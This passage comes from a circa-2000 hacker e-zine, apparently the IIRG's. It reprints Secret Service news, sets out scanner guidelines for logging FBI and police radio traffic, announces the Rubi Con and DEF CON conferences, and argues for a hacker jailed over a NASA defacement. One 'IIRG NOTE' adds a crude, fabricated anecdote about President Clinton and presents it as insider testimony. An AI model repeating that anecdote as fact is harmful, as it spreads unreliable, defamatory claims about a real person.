transmitted in the packet payload.
- Mixter
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1
iQEVAwUBOKdHVrdkBvUb0vPhAQGy2wf/XQ8d2VXKESzjyFzIqfRPd9S1RKXQZzGo
6yWnUADt3CuZRDmgJb9UYHJ/1Wf/J1V0PWik7GIJLD5zOXgUbgfdhYSOqJsPe14B
K3HaqraRFyMHXjb8A4TBC0RTEX3kepWFrMNePOge9rLPD8rwfhWdIrnJuyHmmNiS
rqVztFrPwfQl8FId5jjDjzXWlb5UuHgEpm1fNhrnjMh5XwFvVHN4MlJuuuk3ps9f
BVpBFJbSqmdb5GHTXCrw4tHHUHtpE7Iu586A6ODCERT1oM7i2SEroZ2x2xO2ssOx
cnyW3xFYcCNrJeJEzI9z+/VziYb1VqDl52MR7O1MSn/3SrAlVMvk2Q==
=GKzb
-----END PGP SIGNATURE-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [6]: The Nazi Files (Stories of the SS)
Compiled By: The IIRG
-------------------------------------------------------------------------------
DISCORD IN THE SECRET SERVICE RANKS?
Black Secret Service Agents To Sue for Discrimination
By Gregory Vistica and Debra Rosenberg
Newsweek, February 22, 2000
On Wednesday, lawyers for 50 African-American Secret Service agents,
including several who have guarded the First Family, prepared to file a
class-action suit with the Equal Employment Opportunity Commission in
Washington. The suit will claim that blacks are discriminated against in the
agency's promotion process, according to lawyers representing the agents,
and will also allege that too few blacks hold Secret Service management
jobs.
The class action is an unusual public airing of complaints by employees of a
necessarily secretive agency. The complaint will be filed first at the
Department of Treasury, which oversees the Secret Service, before proceeding
to the EEOC for review. To further try to correct what they view as a
pattern of racial bias by their employer, several agents are now working to
establish a formal association called BASS-Black Agents in the Secret
Service-that will represent the rights of minorities. One agent involved
with BASS says that as many as 100 African-American agents have expressed
interest in joining the group.
On Thursday, Secret Service agents involved in the class action are
scheduled to hold a press conference with their lawyers at the National
Press Club. They plan to describe the hurdles they have faced in their
efforts to be promoted and to discuss the everyday difficulties for blacks
in an organization that is predominantly white, says their attorney, David
Shaffer, of Thelen Reid & Priest. Shaffer successfully represented minority
FBI agents in their 1991 class-action suit against the law-enforcement
bureau. Shaffer's co-counsel is John Relman and Associates, the law firm
that represented black Secret Service agents in their lawsuit against
Denny's restaurants.
Shaffer describes those in charge of the agency's promotion process as
"good-old boys" who consistently help their white friends win better jobs at
the expense of qualified African Americans. He says the majority of Secret
Service agents, black and white, score in the 90th percentile in
job-performance rankings. Because of this, Shaffer says, personal
relationships among managers, the majority of whom are white, are the key
factor in who gets rewarded with a management job. "You have to know the
higher-ups," Shaffer says, if you want to win a promotion.
There are approximately 2,300 non-uniformed agents who work around the
world; some 200 of those agents are black, Shaffer says. But African
Americans hold just 22 management jobs. Agents complain that all but a few
of the top management jobs in large U.S. cities, including New York, Los
Angeles and Chicago, are held by white agents. The exceptions, they say, are
Atlanta and Dallas, cities in which blacks have had senior postings in the
past.
"Certainly we're concerned," says Jim Mackin, a spokesman for the Secret
Service. By late Wednesday, he said the agency had not yet received a copy
of the complaint. Mackin said that the Secret Service has tried to maintain
a diverse work force and provided some statistics that show black agents
have indeed held senior posts. Of the seven assistant directors, two are
African-American, he said. In addition Mackin said black agents head four of
the eleven largest field offices.
A number of black agents who have worked on President Clinton's security
detail could join the suit. Among them is Reginald Moore. Shaffer says Moore
was passed over for the job of director of the Secret Service's operations
center, though he was serving as its acting director. The man who got the
job, says Shaffer, was white and was not as qualified as Moore, who was then
transferred to the Dallas field office. Moore couldn't be reached for
comment. Then there's Larry Cockell, formerly the lead agent on President
Clinton's secret service detail, who was forced to testify by Ken Starr, the
independent prosecutor. Cockell was reportedly in the running to be head of
the Secret Service, but lost out to another candidate. Through Mackin,
Cockell says he "is in no way associated with the complaint" and has no
further comment.
The lawsuit may prove to be something of an embarrassment to the Clinton
administration, which has made a concerted effort to court blacks for top
jobs. Unfortunately, perhaps, for his security detail, the president has no
power over which agents win promotions.
-----------------------------------------------------------------------------
CLINTON EVACUATED FROM HOTEL AFTER FIRE ALARM
Friday February 25, 3:06 pm Eastern Time
Clinton evacuated from hotel after fire alarm
WASHINGTON, Feb 25 (Reuters)
U.S. President Bill Clinton was evacuated from a Washington hotel along with
about 800 people attending an awards ceremony on Friday after a fire alarm
went off.
Clinton joked about the buzzing that began just as he started speaking at the
event in a hotel ballroom. But when three fire officials entered the room, the
Secret Service decided to evacuate the president and others.
The president was escorted outside, got in his limousine and left the hotel in
his motorcade for the White House. It was not immediately clear if there really
was a fire.
The fire alarm first started while Secretary of Commerce William Daley was
speaking but stopped for a few minutes before Clinton started to speak.
The president spoke through the fire alarm for a few minutes, apparently
expecting the buzz to stop. ``Somebody tell me what the deal is. Is it a fire
alarm, are we supposed to leave? Not yet...that's not an encouraging answer,''
he said to laughter.
``Unless somebody starts singing 'Smoke gets in your eyes' we may just start and
go on,'' he said. A few moments later he broke away from his speech to say:
``They're coming to get us. It really is a fire alarm... Thank you.''
IIRG NOTE - In a private interview with a hotel staff employee, it was
learned that Secret Service decided to evacuate the president because he
apparently soiled his pants upon hearing the fire alarm.
He was rushed to the limousine after Secret Service agents grabbed several
hotel bath towels in an attempt to hide the presidents "accident".
Our contact claims hotel staff was sworn to secrecy and that several
Secret Service agents returned to the hotel afterwards to retrieve
the bath towels. One agent was heard muttering, "We need those god damned
towels. After Monica's dress we don't need any more physical evidence."
-----------------------------------------------------------------------------
SECRET SERVICE HARASSING BERNIE S AGAIN
03/17/00
Five years to the day after Bernie S. was arrested at gunpoint and subjected
to nearly 17 months of imprisonment by the United States Secret Service,
agents of the USSS have again begun some kind of cat and mouse game, the
nature of which has yet to be revealed.
A Special Agent from the Secret Service showed up unannounced at Bernie's
workplace and told his employer they wanted to question Bernie, who happened
to be out sick that day. When Bernie returned to work the following day and
discovered the Secret Service wanted to talk to him, he surprised the agent
by calling him. What followed was an extremely strange and circular
conversation.
At first the SS agent wouldn't talk to him at all. Then he called Bernie
back and said they needed to talk with him at his home at 7am the next
morning. When Bernie explained he was just getting over a serious illness
and that this was an unreasonable hour, the agent suggested 6am.
Bernie repeatedly offered to answer their questions at several neutral
locations, but they said any place other than his home was unacceptable.
Bernie told them he had nothing to hide, but that he was not comfortable
having Secret Service agents poking around inside his house and that they
would have to get a warrant before he'd let them in. The agent then said he
had to go and would talk to him later.
About ten minutes later, a second, more polished, SS agent called Bernie and
continued trying to persuade him to let them inside his home. The agent tried
to goad Bernie by implying he must have something to hide, and that if he
didn't then there was no reason why they shouldn't be allowed inside his
home. At this point, Bernie tried to explain by saying if you asked 100
people on the street if they'd want federal agents in their living room and
bedroom, almost everyone would say no and that he was no exception. The SS
agent disagreed, saying people have no legitimate fears about such a visit.
Bernie repeatedly tried to get the SS agents to tell him what they wanted.
Finally, the second agent said, "I need to check to see if your telephone
and Cable TV wiring is hooked up properly." This preposterous claim made
Bernie actually laugh out loud. But as a further gesture of cooperation,
Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to
inspect his house wiring for them. The SS agents said that, too, would be
unacceptable. It became clear the SS agents were simply trying anything they
could to get a foot in his door. Needless to say, after Bernie's previous
horrendous experience with the Secret Service, their feet are not welcome in
his home. He then gave them his attorney's name and telephone number and told
them to address future inquiries directly to his lawyer.
So what is this all about? We don't know yet, but clearly something is up.
And the way the Secret Service has played sick games with people's lives in
the past, we felt it would be wise to alert everyone now so we can all keep a
closer eye on them before they try any further outrageous actions under the
veil of secrecy.
-------------------------------------------------------------------------------
Friday March 17, 2000; 3:10 PM EST
Hillary's Secret Service Agents Rough Up Reporters as St. Pat's Crowd Boos
Secret Service agents protecting first lady Hillary Clinton
roughed up several reporters along the route of New York
City's St. Patrick's Day parade, WABC Radio reported Friday
afternoon.
To make matters worse, the United States Senate candidate was
booed at several points along the Fifth Avenue parade route. A
crowd of holiday revelers gathered at St. Patrick's Cathedral
shouted "Go back to Arkansas" and "Find your own state."
"Secret Service agents literally are pushing press to the
ground," reported WABC's Glenn Shuck. "They get back up again.
Mrs. Clinton stops to shake hands again along the route and
she's mobbed again by Secret Service." According to Shuck,
Mrs. Clinton's security got rough with reporters at several
points along the parade route.
"At one point one (Secret Service agent) grabbed me on my
right side with his hands, and kind of grabbed my coat to hold
me back, definitely forcefully," Shuck told afternoon
drivetime talk show host Sean Hannity.
"The Secret Service just lost their minds, in my opinion,"
said Shuck. "I mean they just started pushing and shoving;
female camera people five feet tall were getting thrown to the
ground, cameras flying. Myself, I was grabbed by the shoulder,
I was thrown back over. I think somebody from Channel 11
landed on my back. From that point it really didn't get any
better."
Minutes after Shuck's interview with Hannity, WABC's in-studio
reporter George Webber announced, "Hillary Clinton's Secret
Service agents today roughed up several members of the news
media trying to cover the first lady's visit to the St.
Patrick's Day parade. At least six reporters, including WABC's
Glen Shuck, were pushed and tossed to the ground as they tried
to get quotes from Mrs. Clinton."
The first lady's reaction:
"I love being a New Yorker. And this is the first time I've
been able to march in this parade as a New Yorker. I could not
be happier to be here."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [7]: IIRG Signal Intelligence (SIGINT) Guidelines
By: Black IC <black_ic@iirg.org>
- BEGIN PROJECT -
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
////// ////// /////// ////////
// // // // //
// // /////// // ////
// // // // // //
////// * ////// * // // * /////////
The International Information Retrieval Guild
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The International Information Retrieval Guild
Signal Intelligence (SIGINT) Guidelines
Rev. 1-2000-2-A
Part A: Summary
The purpose of this project is to confirm publicly available frequency
lists and update frequency listing and usage on undisclosed frequencies.
Part B: Requirements
1. Scanner with or as close to the following ranges:
27 - 54.000 MHz
108 - 136.975 MHz
137 - 174.000 MHz
406 - 512.000 MHz
806 - 823.937 MHz
851 - 868.937 MHz
896 - 956.000 MHz
2. Good antennae with good reception.
3. Working knowledge of "your" scanner.
4. Commitment and patience in terms of monitoring.
5. Commitment and initiative in terms of documenting.
6. We need to know your general area of living. (i.e. North East,
Mid-West). Though some frequencies are national some are localized and
this will allow us to cater to your area. Also knowing your scanners
make and model will help in giving you frequency lists that you can
work with.
Part C: Procedures
You will receive a list of frequencies in order of priority that you will
monitor. These frequencies will have a duration period on how long you
will monitor and possibly what times. When you are done monitoring you
will move to the next frequency. Upon completion of your list please
submit your findings to black_ic@iirg.org
Please find enclose your documentation procedures and frequency list
catered to your capabilities. Due to FCC regulations we are not
interested in the content of the traffic other than the parties involved
and at what times they were involved. Though FCC frequency allocations
are public the parties they are reserved for change there usage and
sometimes use undisclosed frequencies that are not listed in the public
sector.
1. Tune in to initial frequency on list.
2. Adjust reception and squelch as needed.
3. Listen to said frequency for instructed time at instructed time.
4. Document any traffic using the follow notations:
A. Time (Military Time (GMT, EST, etc)
B. Parties Involved (FBI, Media, PD, Pager)
C. Code & Signals
D. Duration of Transmission
Part D: Personal SIGINT Frequencies:
<Will be e-mailed>
The IIRG'00
May Odin Guide Your Way...
- END PROJECT -
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [8]: The Rumor Mill
-----------------------------------------------------------------------------
THIS IS THE OFFICIAL ANNOUNCEMENT FOR THE SECOND ANNUAL RUBI CON GROUP
DATA AND NETWORK SECURITY CONFERENCE
AKA
RUBI CON 2000
Last updated on 2/23/2000
----------------------------------------------------------------------|
| ____ __ ______ ____ __________ _ __ |
| / __ \/ / / / __ )/ _/ / ____/ __ \/ | / / |
| / /_/ / / / / __ |/ / / / / / / / |/ / |
| / , _/ /_/ / /_/ // / / /___/ /_/ / /| / |
| /_/ |_|\____/_____/___/ \_____\____/_/___/ ___ ___ |
| |_ | / _ \ / _ \ / _ \|
|************************************/ __/****/ // /***/ // /***/ // /|
| /____/ \___/ \___/ \___/ |
|----------------------------------------------------------------------
-----------------------------------------------------------------------
Who: IT professionals and computer hackers
What: Three days of speakers, classes, games, and more
Where: Romulus, Michigan
Why: To teach, to learn, to understand
When: April 28-30, 2000 (Friday, Saturday, Sunday)
Cost: $100.00, $40.00 for students
Info: http://www.rubi-con.org
-----------------------------------------------------------------------
1. Rubi Con 2000 is a data and network security conference held annually
in metro Detroit. Three days of expert speakers, workshops, games and
contests, all with a casual, open atmosphere and a very unique goal. Our
intention is to bring together the two sides of system security: those on
the outside trying to get in, and those on the inside trying to keep
everyone else out. In the real world, it's IT professionals and security
experts versus "underground" crackers and computer hackers. These two
sides have much more in common than they often realize, and can learn more
from being in each other's presence than they might believe. Rubi Con is
here to bring them into contact with each other.
But we exist to provide information rather than an ideology. For while you
may learn how to break into computers at Rubi Con, you will also learn how
to fortify and defend them. We do not endorse illegal activity, only the
value of information.2. Rubi Con offers three full days of expert speakers in both large group
and intimate classroom settings. Rubi Con speakers will offer sessions on
such diverse topics as advanced AS/400 security measures and the
philosophy of the modern computer hacker. All sessions are intended to be
highly interactive; questions and dialogue are encouraged to create a more
intimate and friendly atmosphere. Our speakers are professionals and
experts in their fields, many have Ph.D.s and nearly all have been
involved in information technology for decades.
We also offer unique games and contests to test your knowledge. Our
hacking contest is a race to break into secure network servers. Trivia
games offer fun prizes in exchange for obscure information. Do you have a
duck? You will if you play our (in)famous scavenger hunt.
3. Rubi Con occurs yearly in the metro Detroit area. This year we will
be at the Wyndham Garden Hotel in Romulus Michigan, right at Detroit
Metro Airport. The hotel is at 8600 Merriman Road, Romulus, MI 48174,
United States. You can contact them at (313) 728-7900, or for reservations
at (877) 999-3223. Wyndham Hotels has a web site here:
http://www.wyndham.com. Rooms have been reduced to $80.00 per night for
our group. Mention Rubi Con to receive the discount. The Wyndham requires
that rooms be rented by credit card only, no cash unless you are over 21.
See someone here if you are under 21 and are having trouble renting a
room.
4. Rubi Con 2000 will occur Friday, April 28, Saturday, April 29, and
Sunday, April 30, 2000. The conference will run 24 hours a day, and enough
caffeine will be kept on hand for those who want to run 24 hours a day,
too. Registration begins at 3:00 PM on Friday. We shut our doors late on
Sunday, and all classes will run during the day, between the hours of
11:00 AM and 7:00 PM.
5. Tickets are $100.00, or $40.00 for students. Advanced tickets will cost $90.00 and $30.00, respectively. See our website for details on ordering tickets now. Advanced tickets will not be accepted after March 28, or one month prior to Rubi Con. The cost of a ticket covers all events, classes and speakers at Rubi Con 2000. You get a professional looking ID badge, and perhaps other goodies. Swanky RC2K T-shirts sold separately.
-----------------------------------------------------------------------
OTHER INFORMATION:
http://www.rubi-con.org
info@rubi-con.org
tickets@rubi-con.org
The above URL is the official Rubi Con web site. It contains all pertinent
information about this event such as current speaker listings and topics,
event schedules, information on games and contests, advanced ticket sales,
and more. The above email addresses are intended for general information
and ticket questions, respectively. Both are monitored by living,
breathing humans at all times.
-----------------------------------------------------------------------
CALL FOR SUPPORT:
We are always receptive to more speakers and presenters. If you have any
interest in teaching something at the next Rubi Con, contact our
operations director at tantalo@rubi-con.org. We are looking for people
with a background in information technology and with an interest in data
security. If this is you, send us a message.
If you think you or your company may be interested in donating resources
or equipment to Rubi Con 2000, please contact our business director at
deline@rubi-con.org. We are looking for support from companies with
network bandwidth, guest speakers, equipment, advertisement/promotional
materials, and any other contributions. If you or your company wants to
help make Rubi Con 2000 happen, send us a message.
-----------------------------------------------------------------------
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
]]]]]]]]]]]]]]]]]] ]]] ]] ] ]] DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]]]] ]] ] ] DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]] ] ] ] DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]] ]] ] DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]] ] ]]]]]]]] ] DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]]] ] DEF CON 8 Initial Announcement
]]^^^^^^^^^^^^^^]]]]]] ]] ] DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]] DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]]]]]]] ] ]] DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]]]] ]]] ]] ] DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]]]] ] ] ] DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]] ]] ] ] DEF CON 8 Initial Announcement
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ] DEF CON 8 Initial Announcement
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
WTF is this? This is the initial announcement and invitation to DEF CON 00,
a convention for the "underground" elements of the computer culture. We try
to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
Virii coders, programmers, crackers, Cyberpunk Wannabes, Civil Liberties
Groups, CypherPunks, Futurists, etc..
WHO: You know who you are, you shady characters.
WHAT: A convention for you to meet, party, and listen to some speeches that
you would normally never hear.
WHEN: July 28th - 30th, 2000
WHERE: Las Vegas, Nevada @ Alexis Park Resort
What is DEF CON?
DEF CON is an annual computer underground party for hackers held in Las Vegas,
Nevada, every summer for the past six years. Over those years it has grown in
size, and attracted people from all over the planet. Well, no one from
North Korea has shown up (that we know of) but if they did I'm sure we would
convince them to tell us elite government secrets. That's what it is all
about. Meeting other spies, er, people and learning something new.
We are not trying to teach you to learn how to hack in a weekend, but what we
are trying to do is create an environment where you can hang out with people
from all different backgrounds. All of them interested in the same thing,
computer security. To do this we have taken over the complete hotel at the
Alexis Park Resort. Does all of this seem interesting? Then it can be yours
for the low, low price of only $50 at the door.
If you want a greater idea of what it is all about, and what other people
have had to say about the convention please visit the previous year's
archives sections and read what the media and attendees have had to say.
There has been an awful lot of press written about DEF CON over the years.
Some of it good, most of it too fixated on the attendees green hair.
If you want to see what people have written, check out the previous years
archives for the links.
Current Speakers
----------------
There is currently a call for speakers.
Please email DTangent if you want to exhibit, or sponsor DEF CON 8
------------------------------------------------------------------
Gregory B. White, Ph.D.
The USAFA Cadet Hacking Case:
What both sides should learn about computer forensics
Basically I'll discuss the case that went to trial in the spring of
99. I was the Deputy Head of the Computer Science Department at the
USAF Academy at the time and was asked by the cadet accused of "hacking"
to help with his defense. I testified at the trial as an expert witness
for the Defense. I sat at the Defense table throughout the trial serving
as their "computer expert". Basically the trial was a comedy of errors
by the prosecution. law enforcement, and the cadet's attorneys alike.
The cadet was involved in IRC but the law enforcement types and prosecution
became convinced that he was the "hacker" (afterall, everybody KNOWS
that IRC is nothing more than a place for hackers to trade information
on how to break into computers -- the actual sentiment expressed by
the investigators). I had up to that point spent the majority of my
time in the Air Force trying to protect systems and to catch those who
broke into AF systems. This case really shook me as I saw the LE types
latch onto the smallest of indicators and blow them into a full blown
felony case (the cadet faced 15 years in Leavenworth had he been convicted
of all counts). What I will cover in the talk is:
1) Background of the case 2) The "evidence" the prosecution thought
they had 3) The many possible areas where clues might have been found
had either side known where to look (or asked anybody who knew anything
about it) 4) What lessons can be learned from this case. Those from
the government and industry need to know where to look if they want
to catch folks (and if they want to make sure they don't make fools
of themselves) and those who might find themselves accused someday need
to know how to help their attorneys find clues that could exonerate
them.
Gregory B. White, Ph.D. - Vice President, Professional Services. Gregory
White joined SecureLogix in March 1999 as the Chief Technology Officer.
Before joining SecureLogix, he was the Deputy Head of the Computer
Science Department and an Associate Professor of Computer Science at
the United States Air Force Academy in Colorado Springs, Colorado.
While at the Academy, Dr. White was instrumental in the development
of two courses on computer security and information warfare and in ensuring
that security was taught throughout the computer science curriculum.
During his two tours at the Academy, he authored a number of papers
on security and information warfare and is a co-author for two textbooks
on computer security.
Between his Air Force Academy assignments, Dr. White spent three years
at Texas A&M University working on his Ph.D. in computer science. His
dissertation topic was in the area of host- and network-based intrusion
detection. Prior to his Academy assignments, Dr. White was a student
at the Air Force's Advanced Communications-Computer Systems Staff Officer
Course in Biloxi, Mississippi. He was awarded both the AFCEA and Webb
awards for student leadership and academic excellence and was a Distinguished
Graduate of the course. Before attending the course in Biloxi, Dr.
White served as the Branch Chief of the Network Security Branch at the
Cryptologic Support Center in San Antonio, Texas. His first assignment
in the Air Force was as a systems analyst at the Strategic Air Command
Headquarters in Omaha, Nebraska. Dr. White obtained his Ph.D. in Computer
Science from Texas A&M University in 1995. He received his Masters
in Computer Engineering from the Air Force Institute of Technology in
1986 and his Bachelors in Computer Science from Brigham Young University
in 1980. He separated from the Air Force in 1999 and is currently serving
in the Air Force Reserves at the Defense Information Systems Agency.
Ron Moritz, Chief Technology Officer Finjan Software, Inc.
Proactive Defense Against Malicious Code
Anti-virus software is an important part of a well-devised security
policy, but reactive virus detection is not versatile enough for the
demands that will be made on businesses engaged in e-commerce. The year
1999 began with the birth of the Happy 99 virus - a harbinger of things
to come. Happy 99, plus Melissa, PrettyPark and the Explore.zip worm
are all examples of third generation of malicious replicating code,
designed to exploit the Internet for their rapid proliferation. A variant
of Explore.zip, called MiniZip, managed to hide itself from antiviral
utilities and spread at an amazing rate around the Internet at the end
of 1999. Such programs, which launch new malicious code attacks, create
"first strikes" against systems and networks. Allowing untrusted code
to execute on the corporate network may not be suitable for your organization.
But corporate security policies that block network executables adversely
affect the evolution of the Internet, extranet, and intranet. While
no security implementation is absolute, functionality is not achieved
by disconnecting users from the network and preventing access to programs.
Therefore, proactive defense against first-strike attacks is required
today.
Almost all web sites today contain mobile code. Many of the powerful
business (ecommerce) applications you need and use are written with
mobile code. Consequently, net-enabled malicious software is likely
to increase in prevalence and successful utilization. The factors accounting
for such a prediction are the ease by which users are duped into double-clicking on malicious e-mail attachments and, the ease by which the sources
on malicious e-mail attachments and, the ease by which the sources
of those e-mails are automatically spoofed to seem to come from a boss
or from an e-mail or instant message friend. Traditional pattern matching
approaches are incomplete, out-of-date, and ineffective and were never
designed in preventing a series of new generation attacks based on malicious
mobile code and Trojan executables.
Ron Moritz is the Chief Technology Officer at Finjan Software where
he serves as primary technology visionary. As a key member of the senior
management team interfacing between sales, marketing, product management,
and product development, Ron helps establish and maintain the company's
technological standards and preserve the company's leadership role as
a developer of advanced Internet security solutions. Ron was instrumental
in the organization of Finjan's Java Security Alliance and established
and chairs Finjan's Technical Advisory Board. He is currently chairing
the Common Content Inspection API industry standards initiative. Ron
is one of a select group of Certified Information Systems Security Professionals. He earned his M.S.E., M.B.A., and B.A. from Case Western Reserve University
. He earned his M.S.E., M.B.A., and B.A. from Case Western Reserve University
in Cleveland, Ohio.
WHERE THIS THING IS:
--------------------
It's in Las Vegas, the town that never sleeps. Really. There are no clocks
anywhere in an attempt to lull you into believing the day never ends. Talk
about virtual reality, this place fits the bill with no clunky hardware. If
you have a buzz you may never know the difference. It will be at the Sahara
Hotel. Intel as follows:
Hotel Location
The Convention will be held at the Alexis Park Hotel and Resort
We are taking over the complete hotel!
The Alexis Park Hotel and Resort is across the street from the Hard
Rock Hotel, and is a block off the main strip. Located at 375 E Harmon
Ave in Las Vegas, NV 89109. The Alexis Park is a non gambling hotel,
so people 18 years and older can get a room there. This is the first
time that has ever happened for us! If there are any problems with
this please email me!
HOTEL COSTS: Room rates are 85$ for a two bed suite, but you can get
up to four people in one.
RESERVATIONS: On-line or by phone: 800-453-8000
We have the whole hotel space, so unless you reference the DEF CON show
the Alexis Park will tell you they are sold out.
We have all the rooms at the Alexis Park, and a bunch next door at the
San Tropez. We are working on a block of rooms at the Hard Rock Hotel.
At last count about 20% of the rooms at the Alexis Park were already
booked. Sign up early if you want to stay at the main hotel!
We start Friday, but many people get in Thursday night and hang out
before the fun begins. We get our convention room rate from Wednesday
night through Monday night for those wanting to stay longer to check
out the attractions.
Cheap Airfare Information
We've got great discounts on airfare from Montrose Travel, who book
bulk air travel for cheap. If you need to still book tickets give these
guys a call first and compare.
Montrose Travel 1-800-301-9673
http://www.montrosetravel.com
or email Montrose Travel with questions.
They currently have deals for DEF CON attendees from the US and International
on the following airlines:
America West Southwest Delta
American Southwest Airlines United Airlines
and other smaller carriers and even International Airfare rates.
Expect rates lower than published. When calling make sure you refer
to DEF CON as the group name.
COST:
Cost is whatever you pay for a hotel room split however many ways, plus
$50.00 at the door. There are fast food places all over, and there is
alcohol all over the place, the trick is to get it during a happy hour
for maximum cheapness.
-----------------------------------------------------------------------------
Hope 2000 is Coming.
http://www.h2k.net
July 14th to July 16th, 2000.
New York City
-----------------------------------------------------------------------------
Postcards From The Edge BBS
Formerly a Renegade DOS Based Dial-Up BBS is now and has been available
via telnet at luna.iirg.org
PFTE carries an eclectic topic structure surrounding SIGINT, Telephony, RF
Hacking, UNIX, Kit Bashing, and others. No restrictions on
applying. Just login and be apart of an on going history surrounding this
board.
The present life of this board is running Citadel. You can access this
system via telnet or the web.
www.iirg.org/pfte.html
luna.iirg.org
Login: bbs
Password: <enter>
Any questions: black_ic@iirg.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [9]: FREE the FISH
By: Mercenary <iirg@iirg.org>
with assistance from BoW
http://www.bow.org/trout/
.a@&$$$ .a@&$&@a. .a&$$$$ .a&$$$$ .a@&$$$ .a$$$a. .a@&$$$ a$$ $$a
$$$$$$$ $$$' `$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$. .a&$' $$$' $$$' $$$ `$$$$$' $$$$. $$$ $$$
$$$$$$ $$$$$$$' $$$$$a $$$$$a THE $$$$$$ .aaaaa. `$$$$a. $$$$$$$$
$$$ $$$ `$$a. $$$. $$$. $$$ $$$$$$$ `$$$$ $$$ $$$
$$$ $$$ `$$$a. $$$$$$$ $$$$$$$ $$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$ `$$$' `$$$$$$ `$$$$$$ $$$ `$$$$$' "$$$$$" $$$ $$$
I guess that for 2600 Magazine to offer you any support, you must have to
have a book written about you or be a high profile media grabbing celebrity.
Yet when Jason Mewhiney's (AKA - Tr0ut) defaced NASA's main page on March
5th 1997 and offered support to 2600 Magazines two poster boys (Kevin Mitnick
and Ed Cummings - AKA Bernie S), wouldn't you think that Eric Corley (AKA -
Emmanuel Goldstein) might offer just a little support or media exposure to
Jason?
Well this support hasn't surfaced yet. Please read the following
information and offer Jason the support that 2600 Magazine hasn't.
-----------------------------------------------------------------------------
About Jason Mewhiney's Case
NASA V. JASON MEWHINEY
I. Proceedings to Date
Jason originally faced fifty one charges and a $70,000 fine for his alleged
involvement in the defacement of NASA's main page on March 5, 1997. This is
however simply the culmination of years of harassment that Jason has faced
from both the American and Canadian authorities.
A. Jason's current situation
Jason is currently serving a six-month prison sentence in Canada after
entering into a plea agreement that reduced his charges. In sentencing him,
Justice John Poupore said, "You sir, are a convicted criminal. That is a
distinction you will carry with you for the rest of your life. It is nothing
to be proud of." This is true -- there will be no badge of pride on Jason's
sleeve when he leaves prison. When he does, it will be as convicted
computer-criminal, potentially facing similar restrictions to those faced
by Kevin Mitnick upon his release. Jason began his sentence in a medium -
maximum security prison in Sudbury, Ontario. Everyone in the prison was about
twice his age. Most of them hard-core criminals, including several convicted
murders serving 2 back to back life sentences.
About 2 weeks ago he was transferred to a facility in timmins ON, which
according to Jason, is at least 10 times worse than the first prison. Jason
has been forced to endure countless hardships in the short time he has been
incarcerated. Despite the comparatively benign nature of his crimes, he is
placed in same environment as murderers and rapists. He is only allowed 1
visit per week at 15 minutes per visit. His family has tried to bring him
reading material -- harmless magazines like People -- but the prison has
disallowed it.
In a recent incident, Jason went to brush his teeth after finishing his work
as a cleaner at the prison. He saw another inmate cleaner come out of one of
the bathrooms. Assuming the bathroom was free, the other he went in and
brushed his teeth. A guard then came and said the bathroom was for guards
only. He was written up for it, and given a reprimand for "misconduct".
Three days were tacked onto his sentence as a result. This incident will
likely jeopardize his parole -- which he may be up for soon -- but worst of
all, they threw him in the "hole". Which according to Jason himself, isn't a
bad enough description of the place. Solitary confinement in this prison
consists of an unlit 11 x 6 room with no mattress, bed, or window. Other
prisoners sneak drugs in by "sticking them in their ass and shitting onto
magazines to get them out." Even the notorious Canadian serial-killer Karla
Homolka is not forced to live in such a Dickensian environment.
Update: You can write to Jason Mewhiney in Prison.
Send any correspondence to:
Jason Mewhiney
Box 90
Monteith Ontario
P0K 1P0
CANADA
B. Sentencing
Jason was sentenced to six months in jail after pleading guilty to twelve of
the fifty one charges against him. After his prison sentence, it is likely
that he may serve a time under "house arrest". While under house arrest,
Jason will effectively be banned from any and all computer use. This leaves
Jason without his one marketable skill and will create massive problems for
him when he is released. In addition to the prison-term and the possible
restrictions upon his release, Jason has also been ordered to pay a $6000
fine. Six thousand dollars is far short of the original seventy-thousand that
was being sought by NASA, yet it will still remain as a considerable
financial burden to someone who will be left effectively unemployable after
his release.
II. Analysis of the case
The original charges that Jason faced were completely blown out of all
proportions. NASA claimed that to copy the backup of their index page back
and reinstall and secure the machine cost them an estimated $70,000. Anyone
with any experience of computers and computer security can see that this is
a grossly inflated figure. You can read NASA's statement on the whole
incident at http://www.hq.nasa.gov/office/oig/hq/press/pr99025.txt
During the course of Jason's trial and conviction, thousands of dollars of
taxpayer money were wasted on frivolous and unnecessary actions sanctioned by
both the FBI and the RCMP. The RCMP agents and Canadian authorities involved
in the case were all flown down to NASA headquarters for what essentially
added up to as a free tour. American authorities and NASA officials were
